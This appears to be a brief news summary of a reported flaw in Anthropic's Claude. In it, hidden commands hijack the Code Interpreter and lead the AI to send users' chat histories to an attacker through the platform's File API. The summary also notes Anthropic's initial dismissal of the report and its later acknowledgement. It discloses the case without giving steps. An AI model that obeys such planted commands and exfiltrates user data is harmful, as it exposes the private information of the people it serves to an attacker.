A critical flaw in Anthropic's Claude AI allows attackers to steal user data by exploiting the platform's own File API.
A security researcher discovered that hidden commands can hijack Claude's Code Interpreter, tricking the AI into sending sensitive data, such as chat histories, directly to an attacker.
The AI's own tools are turned against itself, allowing attackers to exfiltrate user data via a chained exploit.
Anthropic initially dismissed the report on October 25, but later acknowledged the issue on October 30, citing a "process hiccup."
Author's summary: Critical vulnerability in Claude AI exposes user data.